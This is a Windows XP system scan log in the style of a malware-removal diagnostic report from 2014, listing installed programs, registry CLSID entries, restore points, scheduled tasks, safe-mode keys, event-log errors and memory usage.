QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Readiris Pro 12 (HKLM\...\{3AC26580-A695-4134-84AE-5121B3AAE545}) (Version: 12.00.5965 - I.R.I.S.)
SpyHunter (HKLM\...\{B2C80E75-2409-48EC-8D48-28113DF74915}) (Version: 4.17.6.4336 - Enigma Software Group USA, LLC)
TeamViewer 7 (HKLM\...\TeamViewer 7) (Version: 7.0.13989 - TeamViewer)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 7 (KB980182) (Version: 1 - Microsoft Corporation) Hidden
Update for Windows Internet Explorer 8 (KB976662) (HKLM\...\KB976662-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows Internet Explorer 8 (KB982632) (HKLM\...\KB982632-IE8) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2141007) (HKLM\...\KB2141007) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2345886) (HKLM\...\KB2345886) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2467659) (HKLM\...\KB2467659) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2541763) (HKLM\...\KB2541763) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2607712) (HKLM\...\KB2607712) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2616676) (HKLM\...\KB2616676) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB2641690) (HKLM\...\KB2641690) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB898461) (HKLM\...\KB898461) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB951618-v2) (HKLM\...\KB951618-v2) (Version: 2 - Microsoft Corporation)
Update for Windows XP (KB951978) (Version: 1 - Microsoft Corporation) Hidden
Update for Windows XP (KB955759) (HKLM\...\KB955759) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB955839) (HKLM\...\KB955839) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB967715) (HKLM\...\KB967715) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB968389) (HKLM\...\KB968389) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971029) (HKLM\...\KB971029) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB971737) (HKLM\...\KB971737) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973687) (HKLM\...\KB973687) (Version: 1 - Microsoft Corporation)
Update for Windows XP (KB973815) (HKLM\...\KB973815) (Version: 1 - Microsoft Corporation)
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version:  - Microsoft Corporation)
WebFldrs XP (Version: 9.50.7523 - Microsoft Corporation) Hidden
Windows Driver Package - Citrix Systems monblanking Citrix Driver  (04/25/2013 6.2.101.0) (HKLM\...\831FB1509292986F102B3AB7C8451FA1EA13B0F7) (Version: 04/25/2013 6.2.101.0 - Citrix Systems)
Windows Genuine Advantage Notifications (KB905474) (HKLM\...\WgaNotify) (Version: 1.9.0040.0 - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\KB892130) (Version:  - Microsoft Corporation)
Windows Genuine Advantage Validation Tool (KB892130) (HKLM\...\WGA) (Version: 1.7.0069.2 - Microsoft Corporation)
Windows Internet Explorer 8 (HKLM\...\ie8) (Version: 20090308.140743 - Microsoft Corporation)
Windows Management Framework Core (HKLM\...\KB968930) (Version:  - Microsoft Corporation)
Windows Media Format 11 runtime (HKLM\...\Windows Media Format Runtime) (Version:  - )
Windows Media Format 11 runtime (Version:  - Microsoft Corporation) Hidden
Windows Media Player 11 (HKLM\...\Windows Media Player) (Version:  - )
Windows Media Player 11 (Version:  - Microsoft Corporation) Hidden
Windows Presentation Foundation (Version: 3.0.6920.0 - Microsoft Corporation) Hidden
Winmail Opener 1.4 (HKLM\...\Winmail Opener) (Version: 1.4 - Eolsoft)
Workspace Desktop (HKCU\...\workspacedesktop) (Version:  - Starfield Technologies)
XML Paper Specification Shared Components Pack 1.0 (Version:  - Microsoft Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{05EC5C13-D255-4592-9CCB-98615172F0D6}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{0ADF9C35-0D5E-4B75-88DD-B64868907E17}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{123FAF7F-3FB1-4B8F-AD18-0047401D436A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{37A2FC00-1795-4679-94A3-A153F1A8BB54}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{37A2FC02-1795-4679-94A3-A153F1A8BB54}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{4716D3CE-55DB-4D2A-818C-87D912895890}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{4844F3F7-2161-4AC4-B219-B3B4311782AA}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{4A56F19E-9F50-4F43-93C8-050E44AA83A9}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{4CA41277-032D-4a20-B225-371EBA96ABF2}\localserver32 -> C:\Program Files\Intuit\QuickBooks 2012\qbw32.exe (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{53B5243F-8302-4DAD-BE8F-1D0665E8225E}\InprocServer32 -> C:\Program Files\HP\Common\FWUpdateEDO3.dll (Hewlett-Packard Company)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{5428A9ED-6CD8-11D6-9C8A-0001023DCAA2}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{547C8F00-5567-4AE3-8BB0-CC3CE2AB9070}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{57D590F1-91EB-44CE-8088-AE4AE19D30A1}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{596801D8-2C9D-4627-9C67-195CB81B655A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{5B7331FA-8910-4748-A8A4-60B445041F28}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{5ED8AC89-B2DE-476D-8EEA-E170B2FCB058}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{7694F1CD-A55B-4B7C-8820-A90892EB4E9E}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{7DBF8260-30AD-4D1B-876A-8032B87B809F}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{828E5386-74CF-4019-B356-C857CD028A7D}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{82CC31B3-53B4-4161-A4E9-6B4F1290A6C8}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{8E590317-1329-11D1-B70B-00805F29CD16}\localserver32 -> C:\Program Files\Intuit\QuickBooks 2012\qbw32.exe (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{8FEDE364-AB37-4551-80C9-6D468E222AB2}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{9D9B61F2-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{9D9B61F3-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{9D9B61F4-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{9D9B61F5-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{9D9B61F6-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{9D9B61F7-9E2B-492A-81B3-AA5A1CCFBC3A}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{A63E42D0-9C63-47B5-ABF2-0C839EC20778}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{A63E42D2-9C63-47B5-ABF2-0C839EC20778}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{AF5E0A13-CEAB-47CE-991D-77E82CD1BF3F}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{B10BFAC3-EFF1-40D9-ADA0-BEBE037C24CA}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{B66F2BF1-91EB-44CE-8088-AE4AE19D30A1}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{D14FD6B3-6A9F-4537-9460-07B836707127}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{D4A12AAF-E15E-470B-A6B6-63032186F91F}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{DCB2B478-EFF6-48F6-B718-13E98876854E}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{DFD0AF10-B86C-4AF3-B609-1348D513E565}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{E1A173E1-D957-4C3E-A098-43756A3DB454}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{E1A173E3-D957-4C3E-A098-43756A3DB454}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{E778B152-9033-4C89-8993-2853CCAF683E}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{EADA914E-5B08-4E85-8440-5A087504DF87}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{F2C593CC-74B2-4F71-8556-DD4D426D0409}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{FAC93D42-FFC2-11d1-9DEB-0008C7A08EBA}\localserver32 -> C:\Program Files\Intuit\QuickBooks 2012\qbw32.exe (Intuit Inc.)
CustomCLSID: HKU\S-1-5-21-1173838982-2468196426-3268084377-1009_Classes\CLSID\{FB17915F-06D1-4214-A902-CC5EE05186E9}\InprocServer32 -> C:\Program Files\Common Files\Intuit\QuickBooks\QBObjProxy.dll (Intuit Inc.)

==================== Restore Points  =========================

02-06-2014 23:36:53 System Checkpoint
04-06-2014 01:30:58 System Checkpoint
05-06-2014 03:30:58 System Checkpoint
06-06-2014 05:29:59 System Checkpoint
07-06-2014 07:29:59 System Checkpoint
08-06-2014 21:48:28 System Checkpoint
09-06-2014 23:17:27 System Checkpoint
11-06-2014 01:16:16 System Checkpoint
12-06-2014 03:16:23 System Checkpoint
13-06-2014 03:17:58 System Checkpoint
14-06-2014 05:17:59 System Checkpoint
15-06-2014 07:17:53 System Checkpoint
16-06-2014 09:17:59 System Checkpoint
17-06-2014 11:17:58 System Checkpoint
18-06-2014 19:56:53 System Checkpoint
19-06-2014 21:17:53 System Checkpoint
20-06-2014 23:16:49 System Checkpoint
22-06-2014 03:58:24 System Checkpoint
23-06-2014 05:16:50 System Checkpoint
24-06-2014 07:15:35 System Checkpoint
25-06-2014 09:15:43 System Checkpoint
26-06-2014 09:52:30 System Checkpoint
27-06-2014 11:03:55 System Checkpoint
29-06-2014 23:36:12 System Checkpoint
01-07-2014 02:01:44 System Checkpoint
02-07-2014 03:02:47 System Checkpoint
03-07-2014 05:01:46 System Checkpoint
04-07-2014 07:01:48 System Checkpoint
05-07-2014 09:01:39 System Checkpoint
06-07-2014 18:12:05 System Checkpoint
07-07-2014 19:01:43 System Checkpoint
08-07-2014 21:00:45 System Checkpoint
09-07-2014 23:42:13 System Checkpoint
10-07-2014 23:46:21 System Checkpoint
12-07-2014 00:59:16 System Checkpoint
14-07-2014 04:19:26 System Checkpoint
15-07-2014 06:16:02 System Checkpoint
16-07-2014 08:15:57 System Checkpoint
17-07-2014 09:35:49 System Checkpoint
18-07-2014 10:13:15 System Checkpoint
19-07-2014 11:35:53 System Checkpoint
20-07-2014 12:11:49 System Checkpoint
21-07-2014 13:34:49 System Checkpoint
22-07-2014 17:04:54 System Checkpoint
23-07-2014 18:13:53 System Checkpoint
24-07-2014 18:27:23 System Checkpoint
25-07-2014 20:13:57 System Checkpoint
29-07-2014 01:59:53 System Checkpoint
30-07-2014 02:29:55 System Checkpoint
31-07-2014 04:13:57 System Checkpoint
01-08-2014 04:26:41 System Checkpoint
02-08-2014 06:26:37 System Checkpoint
06-08-2014 13:21:00 System Checkpoint
07-08-2014 14:26:37 System Checkpoint
08-08-2014 16:26:28 System Checkpoint
13-08-2014 13:56:14 System Checkpoint
14-08-2014 15:27:08 System Checkpoint
15-08-2014 17:27:08 System Checkpoint
19-08-2014 16:27:26 System Checkpoint
20-08-2014 17:27:13 System Checkpoint
21-08-2014 19:27:08 System Checkpoint
22-08-2014 21:27:08 System Checkpoint
26-08-2014 04:38:30 System Checkpoint
27-08-2014 05:00:19 System Checkpoint
28-08-2014 07:00:21 System Checkpoint
29-08-2014 09:32:58 System Checkpoint
31-08-2014 18:15:05 Installed %1 %2.
31-08-2014 19:49:56 Removed SupportSoft Assisted Service
01-09-2014 00:21:39 Removed Google Earth Plug-in.
01-09-2014 01:12:06 Installed SpyHunter

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2014-08-31 21:13 - 2014-08-31 21:13 - 00000000 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============


(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\AppleSoftwareUpdate.job => C:\Program Files\Apple Software Update\SoftwareUpdate.exe
Task: C:\WINDOWS\Tasks\At1.job => C:\Program Files\HP\HPLJUT\HPLJUTSCH.exe
Task: C:\WINDOWS\Tasks\At10.job => ?
Task: C:\WINDOWS\Tasks\At12.job => ?
Task: C:\WINDOWS\Tasks\At14.job => ?
Task: C:\WINDOWS\Tasks\At16.job => ?
Task: C:\WINDOWS\Tasks\At18.job => ?
Task: C:\WINDOWS\Tasks\At2.job => ?
Task: C:\WINDOWS\Tasks\At20.job => ?
Task: C:\WINDOWS\Tasks\At22.job => ?
Task: C:\WINDOWS\Tasks\At24.job => ?
Task: C:\WINDOWS\Tasks\At26.job => ?
Task: C:\WINDOWS\Tasks\At28.job => ?
Task: C:\WINDOWS\Tasks\At30.job => ?
Task: C:\WINDOWS\Tasks\At32.job => ?
Task: C:\WINDOWS\Tasks\At34.job => ?
Task: C:\WINDOWS\Tasks\At36.job => ?
Task: C:\WINDOWS\Tasks\At38.job => ?
Task: C:\WINDOWS\Tasks\At4.job => ?
Task: C:\WINDOWS\Tasks\At40.job => ?
Task: C:\WINDOWS\Tasks\At42.job => ?
Task: C:\WINDOWS\Tasks\At44.job => ?
Task: C:\WINDOWS\Tasks\At46.job => ?
Task: C:\WINDOWS\Tasks\At48.job => ?
Task: C:\WINDOWS\Tasks\At49.job => C:\Program Files\HP\HPLJUT\HPLJUTSCH.exe
Task: C:\WINDOWS\Tasks\At50.job => C:\Program Files\HP\HPLJUT\HPLJUTSCH.exe
Task: C:\WINDOWS\Tasks\At51.job => C:\Program Files\HP\HPLJUT\HPLJUTSCH.exe
Task: C:\WINDOWS\Tasks\At6.job => ?
Task: C:\WINDOWS\Tasks\At8.job => ?
Task: C:\WINDOWS\Tasks\DriverCure.job => C:\Program Files\ParetoLogic\DriverCure\DriverCure.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HP WEP.job => C:\Program Files\HP\Dfawep\bin\hpbdfawep.exeLW$Task for execution of hpbdfawep.exe
Task: C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-21-1173838982-2468196426-3268084377-1005.job => C:\Program Files\Real\RealUpgrade\realupgrade.exe
Task: C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-1173838982-2468196426-3268084377-1005.job => C:\Program Files\Real\RealUpgrade\realupgrade.exe
Task: C:\WINDOWS\Tasks\User_Feed_Synchronization-{437A7727-9511-41A1-9450-7A7409618CA2}.job => C:\WINDOWS\system32\msfeedssync.exe

==================== Loaded Modules (whitelisted) =============

2013-07-08 13:34 - 2013-07-08 13:34 - 00057344 _____ () C:\Program Files\24im\24im Messenger\IMHOOK2.dll
2010-10-25 15:36 - 2010-10-25 15:36 - 00119864 _____ () C:\Program Files\HP\ToolboxFX\bin\nativeutils.dll
2008-04-25 12:16 - 2008-04-14 08:00 - 00059904 _____ () C:\WINDOWS\system32\devenum.dll
2008-04-25 12:16 - 2008-04-14 08:00 - 00014336 _____ () C:\WINDOWS\system32\msdmo.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: egui => "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (09/01/2014 11:51:09 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application firefox.exe, version 30.0.0.5269, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (09/01/2014 10:59:06 AM) (Source: Application Error) (EventID: 1004) (User: )
Description: Faulting application g2ax_processfactory.exe, version 2.1.0.715, faulting module g2ax_processfactory.exe, version 2.1.0.715, fault address 0x000019ac.
Error in creating result PEAP-TLV in response to received PEAP-TLV (g2ax_processfactory.exe!ld!)

Error: (09/01/2014 10:58:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application g2ax_processfactory.exe, version 2.1.0.715, faulting module g2ax_processfactory.exe, version 2.1.0.715, fault address 0x000019ac.
Processing media-specific event for [g2ax_processfactory.exe!ws!]

Error: (08/31/2014 03:57:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application rundll32.exe, version 5.1.2600.5512, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (08/31/2014 03:57:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application rundll32.exe, version 5.1.2600.5512, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (08/31/2014 03:57:06 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application mbam.exe, version 1.51.0.1118, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (08/31/2014 03:30:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (08/31/2014 03:28:56 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (08/31/2014 03:28:56 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.

Error: (08/31/2014 03:14:03 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Hanging application iexplore.exe, version 8.0.6001.18702, hang module hungapp, version 0.0.0.0, hang address 0x00000000.


System errors:
=============
Error: (09/01/2014 00:17:41 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The MBAMService service terminated unexpectedly.  It has done this 1 time(s).

Error: (09/01/2014 00:08:03 PM) (Source: Schedule) (EventID: 7901) (User: )
Description: The At26.job command failed to start due to the following error:
%%2147942402

Error: (09/01/2014 00:01:47 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 00:01:15 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 11:59:49 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 11:59:14 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 11:58:08 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 11:56:03 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 11:54:35 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (09/01/2014 11:54:02 AM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.


Microsoft Office Sessions:
=========================
Error: (09/01/2014 11:51:09 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: firefox.exe30.0.0.5269hungapp0.0.0.000000000

Error: (09/01/2014 10:59:06 AM) (Source: Application Error) (EventID: 1004) (User: )
Description: g2ax_processfactory.exe2.1.0.715g2ax_processfactory.exe2.1.0.715000019ac

Error: (09/01/2014 10:58:57 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: g2ax_processfactory.exe2.1.0.715g2ax_processfactory.exe2.1.0.715000019ac

Error: (08/31/2014 03:57:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: rundll32.exe5.1.2600.5512hungapp0.0.0.000000000

Error: (08/31/2014 03:57:22 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: rundll32.exe5.1.2600.5512hungapp0.0.0.000000000

Error: (08/31/2014 03:57:06 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: mbam.exe1.51.0.1118hungapp0.0.0.000000000

Error: (08/31/2014 03:30:34 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe8.0.6001.18702hungapp0.0.0.000000000

Error: (08/31/2014 03:28:56 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe8.0.6001.18702hungapp0.0.0.000000000

Error: (08/31/2014 03:28:56 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe8.0.6001.18702hungapp0.0.0.000000000

Error: (08/31/2014 03:14:03 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe8.0.6001.18702hungapp0.0.0.000000000


==================== Memory info ===========================

Processor: Intel® Core™2 Duo CPU E7400 @ 2.80GHz
Percentage of memory in use: 85%
Total physical RAM: 2036.89 MB
Available physical RAM: 303.5 MB
Total Pagefile: 3929.95 MB
Available Pagefile: 1786.43 MB
